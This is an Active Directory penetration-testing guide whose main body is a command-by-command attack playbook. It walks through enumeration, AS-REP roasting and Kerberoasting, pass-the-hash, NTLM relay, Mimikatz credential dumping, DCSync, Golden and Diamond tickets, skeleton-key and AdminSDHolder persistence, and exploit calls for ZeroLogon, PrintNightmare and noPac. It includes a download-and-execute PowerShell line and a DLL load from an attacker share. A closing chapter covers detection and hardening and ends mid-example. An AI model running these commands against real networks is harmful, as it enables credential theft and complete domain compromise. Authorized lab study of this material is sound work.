
Active Directory Attack

Windows AD Penetration Testing — Complete Guide

From AD Enumeration to Kerberoasting, Pass-the-Hash, DCSync and Golden Ticket: everything about Active Directory attacks in one place.

attacker@kali:~# GetNPUsers.py corp.local/ -usersfile users.txt
$krb5asrep$23$john@CORP.LOCAL:a3f8b...
attacker@kali:~# hashcat -m 18200 hash.txt rockyou.txt
john@CORP.LOCAL : Password123!
📋 Table of Contents

01 Active Directory Introduction
   What is AD, Domain, DC, Forest, Trust, Kerberos
02 Lab Setup
   Setting up Windows Server, Kali, and a vulnerable AD lab
03 AD Enumeration
   BloodHound, PowerView, ldapsearch, enum4linux
   Collecting User, Group, GPO, ACL information
04 Kerberos Attacks
   AS-REP Roasting, Kerberoasting, Overpass-the-Hash
   Pass-the-Ticket, Silver Ticket, Golden Ticket
05 Credential Attacks
   Pass-the-Hash, Pass-the-Password, NTLM Relay
   Mimikatz, secretsdump, LSASS dump
06 Lateral Movement
   WMI, PSExec, SMB, WinRM: spreading across the network
07 Domain Privilege Escalation
   ACL Abuse, AS-REP, Unconstrained Delegation
   PrintNightmare, ZeroLogon, noPac
08 Domain Compromise
   DCSync, ntds.dit dump, Golden Ticket, Diamond Ticket
09 Defense & Detection
   Windows Event Logs, Tiering Model, Hardening
10 Cheat Sheet & Roadmap
   All important commands and the learning path
CHAPTER 01
🏰 Active Directory Introduction
Understand the core foundation of Windows enterprise networks

What is Active Directory?

Active Directory (AD) is Microsoft's directory service that centrally manages users, computers, and policies in a Windows domain network. More than 90% of enterprise networks run AD, so compromising AD means compromising the entire organization.

Core Components

AD Forest: corp.local
│
├── Domain: corp.local
│    ├── Domain Controller (DC)   ← the most important target!
│    │    └── ntds.dit (all user hashes live here!)
│    ├── Users: john, alice, svc_sql...
│    ├── Computers: WS01, SERVER01...
│    ├── Groups: Domain Admins, IT, HR...
│    ├── OUs: Computers, Users, Servers...
│    └── GPOs: Password Policy, Scripts...
│
└── Child Domain: dev.corp.local (Trust relationship)

Kerberos (Port 88) — Authentication Protocol
LDAP (Port 389/636) — Directory Query
SMB (Port 445) — File/Service Access
RPC (Port 135) — Remote Procedure Call

Important Definitions

Term                   | Meaning                                      | Security importance
Domain Controller (DC) | Handles all authentication                   | CRITICAL TARGET
ntds.dit               | AD database; all user hashes live here       | CRITICAL
KRBTGT                 | Account whose key is used to issue tickets   | Golden Ticket!
Domain Admins          | Highest-privilege group                      | Ultimate goal
Service Account        | Account used to run a service                | Kerberoast target
ACL/ACE                | Access control: who may do what              | Can be abused
GPO                    | Group Policy, applied to all machines        | Persistence
SPN                    | Service Principal Name                       | Kerberoast signal

Kerberos Authentication — How Does It Work?

Client              KDC (DC)                    Service

1. AS-REQ ──────────►
   (username + timestamp,
    encrypted w/ password hash)

              ◄──── 2. AS-REP
                       TGT (Ticket Granting Ticket)
                       encrypted w/ KRBTGT hash

3. TGS-REQ ──────────►
   (TGT + SPN request)

              ◄──── 4. TGS-REP
                       Service Ticket
                       encrypted w/ Service Account hash
                       ← Kerberoast happens here! (offline crack)

5. AP-REQ ──────────────────────────────────►
   (Service Ticket)

                              ◄────────────── 6. Access!

AD Attack Kill Chain

🔍 Recon: enumerate users, shares
👤 Initial Access: low-privilege user
🎫 Credential: Kerberoast, PTH
🌐 Lateral Move: WMI, PSExec
⬆️ PrivEsc: ACL abuse, CVE
👑 DA / DCSync: Domain Admin!
⚠️ Important Warning
AD attacks are only for your own lab or an authorized pentest. Running them against a real organization without permission is illegal under the Computer Fraud and Abuse Act.

🏰 AD: Remember

  • ✅ DC = the most important target; if it falls, everything is lost
  • ✅ KRBTGT hash → Golden Ticket → become any user
  • ✅ Kerberos → TGT → Service Ticket → if an SPN is set, Kerberoast!
  • ✅ Kill Chain: Recon → Credential → Lateral → PrivEsc → DA
CHAPTER 02
🔧 Lab Setup
Build your own AD lab, the easy way with Vulnerable-AD

Lab Architecture

VMware / VirtualBox — Host-only Network: 192.168.56.0/24

┌──────────────────────────────────────────────────────┐
│                                                      │
│  ┌─────────────────┐    ┌─────────────────────────┐ │
│  │ Windows Server  │    │   Kali Linux            │ │
│  │ 2019 / 2022     │    │   (Attacker)            │ │
│  │ 192.168.56.10   │    │   192.168.56.20         │ │
│  │                 │    │                         │ │
│  │ ● Domain: corp  │    │ ● impacket              │ │
│  │ ● DC role       │    │ ● BloodHound            │ │
│  │ ● AD DS         │    │ ● CrackMapExec          │ │
│  │ ● Users: 10+    │    │ ● PowerView             │ │
│  └─────────────────┘    └─────────────────────────┘ │
│                                                      │
│  ┌─────────────────┐                                │
│  │ Windows 10 VM   │                                │
│  │ 192.168.56.11   │  (Victim Workstation)          │
│  │ Domain joined   │                                │
│  └─────────────────┘                                │
└──────────────────────────────────────────────────────┘

Vulnerable-AD — Easy Lab Setup

# Vulnerable-AD: https://github.com/WazeHell/vulnerable-AD
# Run in PowerShell (Admin) on Windows Server 2019:
# 1. Create a Windows Server 2019 VM
# 2. Evaluation version: get the ISO from eval.center
# 3. PowerShell (Admin):
Set-ExecutionPolicy Unrestricted -Force
iex ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/WazeHell/vulnerable-AD/master/vulnad.ps1'))
Invoke-VulnAD -UsersLimit 100 -Domain "corp.local"

# This automatically creates:
# ✓ AD Domain: corp.local
# ✓ 100 random users
# ✓ Kerberoastable accounts (SPN set)
# ✓ AS-REP Roastable accounts
# ✓ Misconfigured ACLs
# ✓ Weak passwords

# Alternative: GOAD (Game of Active Directory)
# https://github.com/Orange-Cyberdefense/GOAD
# A larger lab built with Vagrant + VirtualBox

Kali Linux Tool Installation

# Essential AD attack tools:
sudo apt update && sudo apt install -y \
  bloodhound neo4j \
  impacket-scripts \
  crackmapexec \
  evil-winrm \
  ldap-utils \
  smbclient \
  enum4linux \
  kerbrute
# (kerbrute is a Go tool; if apt has no package for it, download the release binary from its GitHub page)

# Python tools:
pip3 install impacket bloodhound

# BloodHound setup:
sudo neo4j start
bloodhound &
# → http://localhost:7474 → neo4j/neo4j → change the password
# Default: neo4j / neo4j

# Add the DC to /etc/hosts:
echo "192.168.56.10 dc01.corp.local corp.local" | sudo tee -a /etc/hosts

# Set DNS:
sudo resolvectl dns eth0 192.168.56.10

🔧 Lab Setup: Remember

  • ✅ Vulnerable-AD → easily creates an intentionally vulnerable lab
  • ✅ BloodHound + neo4j → the best tool for visualizing AD
  • ✅ impacket → the Python-based AD attack toolkit
  • ✅ /etc/hosts → for resolving the domain name
CHAPTER 03
🔍 AD Enumeration
Information gathering: the most important step of an attack

Unauthenticated Enumeration — Without Login

# Network scan
nmap -sV -p 88,135,139,389,445,464,636,3268,3389 192.168.56.10
nmap --script ldap-rootdse -p 389 192.168.56.10      # LDAP info
nmap --script smb-enum-shares -p 445 192.168.56.10   # SMB shares

# enum4linux — SMB/LDAP enumeration
enum4linux -a 192.168.56.10
enum4linux -u "" -p "" -a 192.168.56.10              # Null session

# smbclient — list shares
smbclient -L //192.168.56.10 -N                      # Null session
smbclient //192.168.56.10/SYSVOL -N                  # SYSVOL access

# Kerbrute — find valid usernames (AS-REQ)
kerbrute userenum --dc 192.168.56.10 -d corp.local usernames.txt
# → john@corp.local - VALID
# → alice@corp.local - VALID

BloodHound — Create an AD Map

# Run the BloodHound collector (SharpHound):
# On Windows (as a domain user):
.\SharpHound.exe -c All --zipfilename bloodhound_data.zip

# On Linux (bloodhound-python):
pip3 install bloodhound
bloodhound-python -d corp.local -u john -p Password123 \
  -dc dc01.corp.local -c All --zip

# Import the data in the BloodHound UI:
# Upload Data → select the ZIP file

# Useful BloodHound queries:
# "Find all Domain Admins"
# "Shortest Path to Domain Admins"
# "Find Principals with DCSync Rights"
# "Find Kerberoastable Users"
# "Find AS-REP Roastable Users"
# "Find Computers with Unconstrained Delegation"

PowerView / LDAP — Detailed Enumeration

# PowerView (on a Windows domain machine):
Import-Module .\PowerView.ps1

# ══ Domain Info ══
Get-NetDomain                                      # Domain info
Get-NetDomainController                            # DC list
Get-DomainPolicy                                   # Password policy
(Get-DomainPolicy)."SystemAccess"                  # Min password length etc.

# ══ User Enumeration ══
Get-NetUser                                        # All users
Get-NetUser -Username john                         # A specific user
Get-NetUser | select samaccountname, description   # ⭐ Passwords in descriptions!
Get-NetUser -SPN                                   # Kerberoastable users!
Get-NetUser -PreauthNotRequired                    # AS-REP Roastable!

# ══ Group Enumeration ══
Get-NetGroup "Domain Admins"                       # DA group
Get-NetGroupMember "Domain Admins"                 # DA members
Get-NetLocalGroup -ComputerName WS01               # Local admins

# ══ Computer Enumeration ══
Get-NetComputer                                    # All computers
Get-NetComputer -OperatingSystem "*Server*"
Get-NetComputer -Unconstrained                     # Unconstrained delegation!

# ══ Share Enumeration ══
Find-DomainShare                                   # All shares
Find-InterestingDomainShareFile                    # Interesting files
Invoke-ShareFinder                                 # Accessible shares

# ══ ACL Enumeration ══
Get-ObjectAcl -SamAccountName john -ResolveGUIDs   # john's ACL
Find-InterestingDomainAcl -ResolveGUIDs            # ⭐ Abusable ACLs!

CrackMapExec — Swiss Army Knife

# CrackMapExec (CME) — network-wide enumeration
crackmapexec smb 192.168.56.0/24                                    # Network discovery
crackmapexec smb 192.168.56.10 -u "" -p "" --shares                 # Null-session shares
crackmapexec smb 192.168.56.10 -u john -p Password123 --shares
crackmapexec smb 192.168.56.10 -u john -p Password123 --users
crackmapexec smb 192.168.56.10 -u john -p Password123 --groups
crackmapexec smb 192.168.56.10 -u john -p Password123 --loggedon-users
crackmapexec smb 192.168.56.10 -u john -p Password123 --pass-pol    # Password policy

# Via LDAP:
crackmapexec ldap 192.168.56.10 -u john -p Password123 --bloodhound -c All
crackmapexec ldap 192.168.56.10 -u john -p Password123 --kerberoasting kerberoast.txt
crackmapexec ldap 192.168.56.10 -u john -p Password123 --asreproast asrep.txt

🔍 Enumeration: Remember

  • ✅ BloodHound → visualize AD, find attack paths
  • ✅ Get-NetUser | select description → passwords in descriptions!
  • ✅ Get-NetUser -SPN → Kerberoast target | -PreauthNotRequired → AS-REP target
  • ✅ CME → quick network-wide enumeration
CHAPTER 04
🎫 Kerberos Attacks
AS-REP Roasting, Kerberoasting, Golden Ticket: the most powerful AD attacks

AS-REP Roasting — Pre-auth Disabled User

# If pre-authentication is disabled → you get a crackable hash without knowing the password!
# User attribute: vulnerable when DONT_REQ_PREAUTH is set

# impacket — GetNPUsers.py:
GetNPUsers.py corp.local/ -dc-ip 192.168.56.10 -usersfile users.txt -no-pass
GetNPUsers.py corp.local/john:Password123 -dc-ip 192.168.56.10 -request
# Output: $krb5asrep$23$alice@CORP.LOCAL:3f8a2b...   ← crack this!

# CrackMapExec:
crackmapexec ldap dc01.corp.local -u john -p Password123 --asreproast asrep.txt

# Crack the hash:
hashcat -m 18200 asrep.txt rockyou.txt
hashcat -m 18200 asrep.txt rockyou.txt --force     # --force ignores hashcat's warnings (e.g. a VM without GPU drivers)
john --format=krb5asrep asrep.txt --wordlist=rockyou.txt

# Find AS-REP vulnerable users with PowerView:
Get-NetUser -PreauthNotRequired | select samaccountname

Kerberoasting — Stealing Service Account Hashes

# Request a Service Ticket for every account that has an SPN (Service Principal Name) set
# The Service Ticket is encrypted with the service account's hash → offline crack!

# impacket — GetUserSPNs.py:
GetUserSPNs.py corp.local/john:Password123 -dc-ip 192.168.56.10 -request
GetUserSPNs.py corp.local/john:Password123 -dc-ip 192.168.56.10 -request -outputfile kerberoast.txt
# Output: $krb5tgs$23$*svc_sql$CORP.LOCAL$corp.local/svc_sql*$2ac8...   ← crack!

# CrackMapExec:
crackmapexec ldap dc01.corp.local -u john -p Password123 --kerberoasting kerberoast.txt

# PowerShell (Windows, Rubeus):
.\Rubeus.exe kerberoast /outfile:kerberoast.txt

# Crack the hash (pick the hashcat mode that matches the $krb5tgs$<etype>$ prefix):
hashcat -m 13100 kerberoast.txt rockyou.txt    # RC4, etype 23 ($krb5tgs$23$, most common)
hashcat -m 19600 kerberoast.txt rockyou.txt    # AES128, etype 17 ($krb5tgs$17$)
hashcat -m 19700 kerberoast.txt rockyou.txt    # AES256, etype 18 ($krb5tgs$18$)
john --format=krb5tgs kerberoast.txt --wordlist=rockyou.txt

Pass-the-Ticket (PTT)

# Steal a TGT or Service Ticket and reuse it
# Rubeus (Windows):
.\Rubeus.exe dump /nowrap                  # Dump all tickets
.\Rubeus.exe tgtdeleg /nowrap              # Extract a TGT
.\Rubeus.exe ptt /ticket:BASE64_TICKET     # Inject a ticket

# impacket — use a stolen ticket (ccache) from Linux:
export KRB5CCNAME=/tmp/john.ccache
psexec.py -k -no-pass corp.local/john@dc01.corp.local

Golden Ticket — Ultimate Access

👑 Golden Ticket — The Most Powerful Attack
With the KRBTGT account's NTLM hash, you can access any service as any user (even a non-existent one). The Golden Ticket keeps working until the KRBTGT password is reset!
# Requirements for a Golden Ticket:
# 1. Domain name: corp.local
# 2. Domain SID: S-1-5-21-...
# 3. KRBTGT NTLM hash

# Get the domain SID:
Get-DomainSID                                                     # PowerView
whoami /user                                                      # Windows (the SID without the trailing user RID)
lookupsid.py corp.local/john:Password123@dc01.corp.local 0        # impacket

# Get the KRBTGT hash (needs DA privilege):
secretsdump.py corp.local/Administrator:Admin123@dc01.corp.local  # DCSync
# → krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a94f57ec31d1b9...

# Create and inject the Golden Ticket — impacket:
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local backdoor_admin
export KRB5CCNAME=backdoor_admin.ccache
psexec.py -k -no-pass corp.local/backdoor_admin@dc01.corp.local

# Mimikatz (Windows):
kerberos::golden /user:backdoor /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ptt
misc::cmd    # Shell with the golden ticket

🎫 Kerberos Attacks: Remember

  • ✅ AS-REP Roast → pre-auth disabled → GetNPUsers.py → hashcat -m 18200
  • ✅ Kerberoast → SPN set → GetUserSPNs.py → hashcat -m 13100
  • ✅ Golden Ticket → KRBTGT hash → access everything!
  • ✅ Both AS-REP Roast and Kerberoast can be done with a low-privilege user
CHAPTER 05
🔑 Credential Attacks
Authenticate with a hash without knowing the password: PTH, NTLM Relay, Mimikatz

Pass-the-Hash (PTH)

# With an NTLM hash you can authenticate without the password!
# Hash format: LM:NT (aad3b435b51404eeaad3b435b51404ee:NTLM_HASH)

# impacket — psexec, smbexec, wmiexec:
psexec.py corp.local/Administrator@192.168.56.10 -hashes :NTLM_HASH
smbexec.py corp.local/Administrator@192.168.56.10 -hashes aad3...:NTLM_HASH
wmiexec.py corp.local/Administrator@192.168.56.10 -hashes :NTLM_HASH

# CrackMapExec PTH:
crackmapexec smb 192.168.56.0/24 -u Administrator -H NTLM_HASH
crackmapexec smb 192.168.56.10 -u Administrator -H NTLM_HASH --exec-method wmiexec -x "whoami"

# evil-winrm PTH:
evil-winrm -i 192.168.56.10 -u Administrator -H NTLM_HASH

# Mimikatz (Windows) — sekurlsa::pth
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:cmd.exe

Mimikatz — Credential Extraction

# Mimikatz: https://github.com/gentilkiwi/mimikatz
# Extracts plaintext passwords and hashes from LSASS
privilege::debug               # Debug privilege (needs Admin)
sekurlsa::logonpasswords       # ⭐⭐⭐ Credentials of every logged-in user!
sekurlsa::wdigest              # WDigest plaintext (old Windows)
sekurlsa::tickets              # Kerberos tickets
sekurlsa::krbtgt               # KRBTGT session key
lsadump::sam                   # Local SAM database
lsadump::lsa /patch            # LSA secrets
lsadump::dcsync /user:krbtgt   # DCSync!

# LSASS dump → offline analysis:
# Task Manager → Details → lsass.exe → Right-click → Create dump file
# Procdump:
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Dump analysis (on Kali):
pypykatz lsa minidump lsass.dmp      # pip3 install pypykatz

NTLM Relay Attack

# Responder + ntlmrelayx — MITM credential capture
# Step 1: run Responder (NBT-NS/LLMNR poisoning).
# For relaying, Responder's own SMB and HTTP servers must be off (Responder.conf: SMB = Off, HTTP = Off),
# otherwise Responder answers the authentication itself instead of letting ntlmrelayx relay it:
sudo responder -I eth0 -rdwv

# Step 2: run ntlmrelayx (impacket):
ntlmrelayx.py -tf targets.txt -smb2support
ntlmrelayx.py -tf targets.txt -smb2support -i                 # Interactive SMB shell
ntlmrelayx.py -tf targets.txt -smb2support -e shell.exe       # Execute payload
ntlmrelayx.py -tf targets.txt -smb2support -c "net user hacker P@ss /add /domain"

# Step 3: when a victim connects to \\FAKE_HOST → the hash is relayed

# Mitigation: enable SMB Signing (relay no longer works)
crackmapexec smb 192.168.56.0/24 --gen-relay-list targets.txt   # Hosts with signing disabled

secretsdump — Remote Credential Dump

# impacket — secretsdump.py
# Remote credential dump (needs Admin access):
secretsdump.py corp.local/Administrator:Admin123@192.168.56.10
secretsdump.py corp.local/Administrator@192.168.56.10 -hashes :NTLM_HASH

# Output:
# corp.local\Administrator:500:aad3...:8846f7eaee8fb117...
# corp.local\john:1104:aad3...:3dbde697d71690a769204...
# krbtgt:502:aad3...:a94f57ec31d1b96ce13abb789...   ← Golden Ticket!

# From ntds.dit (local):
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

🔑 Credential Attacks: Remember

  • ✅ Pass-the-Hash → psexec.py -hashes :NTLM_HASH
  • ✅ Mimikatz → sekurlsa::logonpasswords → plaintext + hash
  • ✅ NTLM Relay → Responder + ntlmrelayx → works when SMB signing is off
  • ✅ secretsdump.py → remote hash dump; needs Admin access
CHAPTER 06
🌐 Lateral Movement
Techniques for moving from one machine to another on the network

Lateral Movement Methods

# ══════════ PSExec (SMB) ══════════
psexec.py corp.local/Administrator:Admin123@192.168.56.11
psexec.py corp.local/Administrator@192.168.56.11 -hashes :NTLM_HASH
# Needs port 445 (SMB) + an admin share

# ══════════ WMIExec ══════════
wmiexec.py corp.local/Administrator:Admin123@192.168.56.11
wmiexec.py corp.local/Administrator@192.168.56.11 -hashes :NTLM_HASH
# Port 135 (WMI)

# ══════════ SMBExec ══════════
smbexec.py corp.local/Administrator:Admin123@192.168.56.11
# Noisier than wmiexec

# ══════════ WinRM (5985) ══════════
evil-winrm -i 192.168.56.11 -u Administrator -p Admin123
evil-winrm -i 192.168.56.11 -u Administrator -H NTLM_HASH
# PowerShell remoting

# ══════════ CrackMapExec ══════════
crackmapexec smb 192.168.56.0/24 -u Administrator -p Admin123                 # Password spray
crackmapexec smb 192.168.56.0/24 -u Administrator -H NTLM_HASH                # PTH spray
crackmapexec smb 192.168.56.0/24 -u Administrator -p Admin123 -x "ipconfig"   # Execute

# ══════════ RDP (3389) ══════════
xfreerdp /v:192.168.56.11 /u:Administrator /p:Admin123
xfreerdp /v:192.168.56.11 /u:Administrator /pth:NTLM_HASH    # Restricted Admin mode

PowerShell Remoting

# Remote execution with PowerShell (WS-Management)
# Create a remote session:
$session = New-PSSession -ComputerName WS01 -Credential corp\Administrator
Enter-PSSession -ComputerName WS01 -Credential corp\Administrator
# A shell opens: [WS01]: PS C:\>

# Run a remote command:
$cred = Get-Credential corp\Administrator     # prompts for the password once
Invoke-Command -ComputerName WS01 -ScriptBlock {whoami; hostname}
Invoke-Command -ComputerName WS01 -Credential $cred -ScriptBlock {ipconfig}

# Run a script:
Invoke-Command -ComputerName WS01 -FilePath .\payload.ps1

# impacket — atexec.py (Scheduled Task):
atexec.py corp.local/Administrator:Admin123@192.168.56.11 "whoami"

Token Impersonation — Stealing Privileges

# Windows token: the identity of each process
# If a Domain Admin is logged in to the machine → impersonate their token!

# Incognito (Metasploit):
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "CORP\\Administrator"

# Rubeus — tickets per logon session:
.\Rubeus.exe triage                        # Show all Kerberos tickets
.\Rubeus.exe dump /nowrap /luid:0x3e4      # Dump the tickets of one logon session (LUID)

# Metasploit getsystem:
meterpreter > getsystem    # SYSTEM via token impersonation

🌐 Lateral Movement: Remember

  • ✅ WMIExec → the least noisy
  • ✅ evil-winrm → WinRM (5985) → easy interactive shell
  • ✅ CME → fast network-wide spray
  • ✅ Token impersonation → if a DA is logged in to the machine → become DA
CHAPTER 07
⬆️ Domain Privilege Escalation
The path from low-privilege user to Domain Admin

ACL Abuse — Permission Misconfiguration

# Dangerous AD rights:
GenericAll           # → Full control! Password reset, add to group
GenericWrite         # → Write any attribute → set an SPN → Kerberoast!
WriteOwner           # → Become the object's owner
WriteDACL            # → Grant DCSync rights!
ForceChangePassword  # → Change the password
AllExtendedRights    # → Includes ForceChangePassword
AddMember            # → Add members to the group
Self                 # → Add yourself to the group

# GenericAll on User → Password Reset:
Set-DomainUserPassword -Identity alice -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force) -Verbose

# GenericAll on Group → Member Add:
Add-DomainGroupMember -Identity "Domain Admins" -Members john -Verbose

# GenericWrite → Targeted Kerberoasting:
Set-DomainObject -Identity alice -Set @{serviceprincipalname='nonexistent/BLAH'}
# Now kerberoast alice!
GetUserSPNs.py corp.local/john:Password123 -dc-ip 192.168.56.10 -request

# WriteDACL → grant DCSync rights (PowerShell continues lines with a backtick, not a backslash):
Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" `
  -PrincipalIdentity john `
  -Rights DCSync -Verbose
# Now DCSync as john!

Unconstrained Delegation

# Unconstrained Delegation: a computer or service can act as the user towards any other service
# If a DA connects to the vulnerable computer → their TGT can be taken!

# Find computers with unconstrained delegation:
Get-NetComputer -Unconstrained | select samaccountname
# Any machine in this list other than a DC is vulnerable!

# Coerce authentication with the Printer Bug (SpoolSample):
# Make the DC connect to the vulnerable machine → capture its TGT!
.\SpoolSample.exe DC01 COMPROMISED_MACHINE

# Monitor for incoming TGTs with Rubeus:
.\Rubeus.exe monitor /interval:5 /nowrap
# → DC01$'s TGT captured → DCSync!

Critical CVEs — AD Privilege Escalation

ZeroLogon (CVE-2020-1472)
CRITICAL — CVSS 10.0
Netlogon authentication bypass: the DC's machine account password can be set to empty, then DCSync!
cve-2020-1472-exploit.py -n DC01 -t 192.168.56.10

PrintNightmare (CVE-2021-1675)
CRITICAL
RCE in the Print Spooler service → SYSTEM privileges. A low-privilege user can become DA.
CVE-2021-1675.py corp.local/john:Pass@dc01 '\\attacker\share\shell.dll'

noPac (CVE-2021-42278/42287)
CRITICAL
Domain user → Domain Admin in one step! Machine account name manipulation.
noPac.py corp.local/john:Pass -dc-ip 192.168.56.10 --impersonate Administrator -dump

PetitPotam (CVE-2021-36942)
HIGH
NTLM coercion: force the DC to connect to the attacker → NTLM relay → DA!
PetitPotam.py attacker_ip dc_ip

⬆️ Domain PrivEsc: Remember

  • ✅ BloodHound → "Shortest Path to DA" → find the attack path
  • ✅ GenericAll → password reset | GenericWrite → Kerberoast | WriteDACL → DCSync
  • ✅ ZeroLogon, noPac → if unpatched → DA in one step!
  • ✅ Find-InterestingDomainAcl → find abusable ACLs
CHAPTER 08
👑 Domain Compromise
DCSync, ntds.dit dump, Golden Ticket: complete domain control

DCSync — Domain Replication Attack

# DCSync: abuse the DC's replication API to pull every hash
# Requires: Domain Admin OR DCSync rights (grantable via WriteDACL)

# impacket — secretsdump.py (the easiest way):
secretsdump.py corp.local/Administrator:Admin123@192.168.56.10
secretsdump.py corp.local/Administrator@192.168.56.10 -hashes :NTLM_HASH

# A specific user / NTLM hashes only:
secretsdump.py corp.local/Administrator:Admin123@dc01.corp.local -just-dc-user krbtgt
secretsdump.py corp.local/Administrator:Admin123@dc01.corp.local -just-dc-ntlm

# Output:
# corp.local\Administrator:500:aad3...:8846f7eaee8fb117ad06bdd830b7586c
# corp.local\krbtgt:502:aad3...:a94f57ec31d1b96ce13abb789f4db0d0   ← Golden Ticket!
# corp.local\john:1104:aad3...:3dbde697d71690a769204beb12283678

# Mimikatz DCSync:
lsadump::dcsync /domain:corp.local /user:krbtgt
lsadump::dcsync /domain:corp.local /all /csv

ntds.dit — All Hashes in One File

# ntds.dit = the AD database (C:\Windows\NTDS\ntds.dit)
# The SYSTEM hive is also needed (it holds the key that encrypts the database)

# Copy it via Volume Shadow Copy (as Admin on the DC):
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\ntds.dit
reg save HKLM\SYSTEM C:\temp\SYSTEM

# With ntdsutil:
ntdsutil "ac i ntds" "ifm" "create full C:\temp" q q

# Parse locally with impacket:
secretsdump.py -ntds C:\temp\ntds.dit -system C:\temp\SYSTEM LOCAL
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

# CrackMapExec can also dump the local SAM remotely (it dumps hashes, it does not crack them):
crackmapexec smb 192.168.56.10 -u Administrator -H NTLM_HASH --sam

Persistence — Maintaining DA Access

# Golden Ticket (with the KRBTGT hash: valid for 10 years!):
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... \
  -domain corp.local -duration 3650 backdoor_admin

# Silver Ticket (service account hash: one specific service):
ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... \
  -domain corp.local -spn cifs/dc01.corp.local backdoor_user

# Diamond Ticket (an improved version of the Golden Ticket):
ticketer.py -request -domain corp.local -user john -password Pass123 \
  -nthash KRBTGT_HASH -aesKey AES_KEY -domain-sid S-1-5-21-... \
  -user-id 500 Administrator

# Skeleton Key (on the DC: any user can then log in with the password "mimikatz"):
misc::skeleton        # Mimikatz, run on the DC
# Password: "mimikatz"

# AdminSDHolder abuse (persistence):
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=corp,DC=local' `
  -PrincipalIdentity john -Rights All -Verbose
# When SDProp runs, john's permissions propagate to every protected group!

# Rogue DC — DCShadow (stealth):
# Mimikatz lsadump::dcshadow — register a fake DC

👑 Domain Compromise: Remember

  • ✅ DCSync → secretsdump.py → all hashes; needs DA or DCSync rights
  • ✅ ntds.dit → Shadow Copy → offline parse, all hashes
  • ✅ Golden Ticket → KRBTGT hash → 3650-day ticket, full domain control!
  • ✅ Reset the KRBTGT password twice → Golden Tickets are invalidated!
CHAPTER 09
🛡️ Defense & Detection
AD hardening and attack detection: Blue Team guide

Important Windows Event IDs

Event ID | What happened                     | Attack
4625     | Logon failed                      | Brute force
4648     | Logon with explicit credentials   | Pass-the-Hash
4672     | Special privileges assigned       | Privilege escalation
4688     | New process created               | Malicious execution
4698     | Scheduled task created            | Persistence
4720     | User account created              | Backdoor account
4732     | Member added to security group    | Privilege escalation
4768     | Kerberos TGT requested            | AS-REP Roasting
4769     | Kerberos service ticket requested | Kerberoasting
4771     | Kerberos pre-auth failed          | Password spray
4776     | NTLM authentication               | Pass-the-Hash
4662     | AD object accessed (DCSync!)      | DCSync

AD Hardening Checklist

Must Do

  • Reset the KRBTGT password regularly (twice)
  • Enable SMB Signing
  • Disable LLMNR/NBT-NS (prevents NTLM Relay)
  • Use the Protected Users group
  • LAPS (Local Administrator Password Solution)
  • Tiered Administration Model
  • Privileged Access Workstation (PAW)
  • Windows Defender Credential Guard
  • Audit logging (Event ID 4662, 4769)
  • Microsoft ATA / Defender for Identity

Never Do

  • Daily work with a Domain Admin account
  • Weak passwords on service accounts
  • Setting unnecessary SPNs
  • Using Unconstrained Delegation
  • Enabling WDigest authentication
  • Leaving SMB v1 enabled
  • Email/browsing from a DA account
  • Print Spooler on a DC
  • Local logon with Domain Admin

Kerberoasting Detection

# Event ID 4769 — Kerberos Service Ticket Request
# Normal: Ticket Encryption Type 0x12 (AES256)
# Suspicious: Ticket Encryption Type 0x17 (RC4-HMAC) → Kerberoast!

# Splunk query:
index=windows EventCode=4769 Ticket_Encryption_Type=0x17
| stats count by Account_Name, Service_Name
| where count > 5

# Service account hardening:
# Enforce AES-only encryption:
Set-ADUser svc_sql -KerberosEncryptionType AES256

# Use a Managed Service Account (MSA) or Group MSA:
New-ADServiceAccount -Name "svc_app" -ManagedPasswordIntervalInDays 30
# (a gMSA also needs -DNSHostName, -PrincipalsAllowedToRetrieveManagedPassword and a KDS root key in the domain)
# → The password rotates automatically, which makes cracking far harder!
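As an added example (not part of the original guide or of any tool it names), the two detections from the Event ID table and the Splunk query above, run in Python over constructed JSON-formatted Security events: accounts that obtain more than a threshold of distinct RC4 (0x17) service tickets via 4769, and 4662 events in which a principal other than a known DC exercised the DS-Replication-Get-Changes rights that DCSync needs. The JSON field names, the sample events and the `dc_accounts` list are assumptions; the three replication-right GUIDs are the real AD control-access-right GUIDs.

```python
"""Kerberoasting (4769/RC4) and DCSync (4662/replication rights) detection over
constructed Windows Security events. Added example; field names are assumptions."""
import json
from collections import defaultdict

RC4_HMAC = "0x17"   # etype 23: the encryption type Kerberoast tooling requests

# Control-access rights a DCSync caller exercises (real AD rightsGuid values)
DCSYNC_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
REPL_PROPS = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"


def _tgs(user, service, etype, ip):
    """One constructed 4769 record (assumed JSON layout, not a real log export)."""
    return {"EventCode": 4769, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "Status": "0x0", "IpAddress": ip}


def _objaccess(subject, properties):
    """One constructed 4662 record; Properties carries the access-right GUIDs."""
    return {"EventCode": 4662, "SubjectUserName": subject,
            "ObjectType": "domainDNS", "Properties": properties}


# Constructed sample log: john pulls RC4 tickets for seven service accounts
# (Kerberoast pattern), alice's traffic is benign, DC01$ replicates as DCs do,
# and john also issues a replication request that only DCs should make.
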